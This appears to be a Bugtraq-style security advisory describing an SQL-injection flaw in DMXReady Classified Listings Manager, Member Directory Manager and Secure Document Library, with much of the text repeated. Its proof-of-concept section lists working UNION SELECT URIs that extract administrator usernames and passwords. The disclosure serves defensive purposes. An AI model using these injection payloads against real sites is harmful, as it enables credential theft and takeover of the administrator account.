DMXReady Multiple Products 'upload_image_category.asp' SQL Injection Vulnerability
BID:33253
Info
DMXReady Multiple Products 'upload_image_category.asp' SQL Injection Vulnerability
| Bugtraq ID: | 33253 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 14 2009 12:00AM |
| Updated: | Jan 22 2009 10:42PM |
| Credit: | ajann |
| Vulnerable: |
DMXReady Secure Document Library 1.1 DMXReady Member Directory Manager 1.1 DMXReady Classified Listings Manager 1.1 |
| Not Vulnerable: | |
Discussion
DMXReady Multiple Products 'upload_image_category.asp' SQL Injection Vulnerability
Multiple products by DMXReady are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following are affected:
DMXReady Classified Listings Manager 1.1 and prior versions
DMXReady Member Directory Manager 1.1 and prior versions
DMXReady Secure Document Library 1.1 and prior versions
Multiple products by DMXReady are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following are affected:
DMXReady Classified Listings Manager 1.1 and prior versions
DMXReady Member Directory Manager 1.1 and prior versions
DMXReady Secure Document Library 1.1 and prior versions
Exploit / POC
DMXReady Multiple Products 'upload_image_category.asp' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config
http://www.example.com/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config
http://www.example.com/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config
http://www.example.com/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config
http://www.example.com/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
http://www.example.com/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config
http://www.example.com/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config
http://www.example.com/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config
http://www.example.com/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config
http://www.example.com/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
http://www.example.com/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
Solution / Fix
DMXReady Multiple Products 'upload_image_category.asp' SQL Injection Vulnerability
Solution:
Vendor updates are available. Contact the vendor for details.
Solution:
Vendor updates are available. Contact the vendor for details.
References
DMXReady Multiple Products 'upload_image_category.asp' SQL Injection Vulnerability
References:
References:
- Classified Listings Manager (DMXReady)
- DMXReady Homepage (DMXReady)
- Member Directory Manager (DMXReady)